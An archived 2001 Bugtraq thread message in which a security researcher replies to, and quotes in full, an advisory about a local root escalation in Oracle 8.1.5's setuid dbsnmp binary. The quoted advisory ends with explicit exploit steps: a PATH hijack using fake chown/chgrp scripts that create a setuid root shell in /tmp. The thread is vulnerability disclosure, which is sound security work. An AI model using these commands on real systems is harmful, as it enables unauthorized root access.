RE: Oracle 8.1.5 dbnsmp vulnerability

From: Aaron C. Newman (aaron@newman-family.com)
Date: 08/01/01

Previous message: Georgi Guninski: "Re: Multiple Remote DoS vulnerabilities in Microsoft DCE/RPC deamons"
In reply to: Ismael Briones: "Oracle 8.1.5 dbnsmp vulnerability"
Next in thread: Theo Van Dinter: "Re: Oracle 8.1.5 dbnsmp vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: "Aaron C. Newman" <aaron@newman-family.com>
To: "Ismael Briones" <ismael@el-mundo.net>, <bugtraq@securityfocus.com>
Subject: RE: Oracle 8.1.5 dbnsmp vulnerability
Date: Wed, 1 Aug 2001 14:12:22 -0400
Message-ID: <MBEGJBCJPBGIOCKFMLLPIEAFCJAA.aaron@newman-family.com>

Funny to see Oracle's canned response to this. I'm not 100% sure this is
exactly the same problem, but I worked with them fixing what looks like the
same problem back in 1999. They provided a patch way back then - might be
that whoever respond to you is not "up to speed".

See the advisory dated August 23, 1999
http://xforce.iss.net/alerts/advise36.php

Aaron C. Newman
CTO/Founder
Application Security, Inc.
212-490-6022
anewman@appsecinc.com
www.appsecinc.com
-Protection Where It Counts-

-----Original Message-----
From: bugtraq-return-1460-aaron=newman-family.com@securityfocus.com
[mailto:bugtraq-return-1460-aaron=newman-family.com@securityfocus.com]On
Behalf Of Ismael Briones
Sent: Wednesday, August 01, 2001 1:14 PM
To: bugtraq@securityfocus.com
Subject: Oracle 8.1.5 dbnsmp vulnerability

Title: Vulnerability in dbsnmp in Oracle 8.1.5
Date: 01-08-2001
Platform: Only tested in Digital Unix.
Impact: Any user can gain root privileges
Author: Ismael Briones Vilar (ismael@el-mundo.net)
Status: Vendor Contacted, and they are investigating a fix .

PROBLEM SUMMARY:

There is a problem in dbsnmp that can be used by local users to obtain
root privileges. The dbsnmp is setuid root. When a user execute dbsnmp there
is a call to chown and chgrp, but without especify the path, so any user can
define his PATH variable to exploit this vulnerability:

Probed in Oracle 8.1.5.
Oracle 8.1.6 is not vulnerable

IMPACT:

Any user with local access, can gain root privileges

SOLUTION:

Maybe a chmod -s

STATUS:

Vendor was contacted 30/07/2001 and Oracle answer:

"We are investigating a fix as we speak."

EXPLOIT:

export PATH=~/bin/:$PATH

Then we create the file ~/bin/chown or ~/bin/chgrp:

#!/bin/sh
cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX

(We have to put all in the same line, separated by semicolon)

We make our chown or chgrp executable:

chmod +x ~/bin/chown

chmod +x ~/bin/chgrp

When the user execute dbsnmp, the system look for chown in the first
directory of the PATH variable, execute our chown file and whe have a shell
setuid root in /tmp/XXX.

-------------------------
Ismael Briones Vilar
ismael@el-mundo.net

Previous message: Georgi Guninski: "Re: Multiple Remote DoS vulnerabilities in Microsoft DCE/RPC deamons"
In reply to: Ismael Briones: "Oracle 8.1.5 dbnsmp vulnerability"
Next in thread: Theo Van Dinter: "Re: Oracle 8.1.5 dbnsmp vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]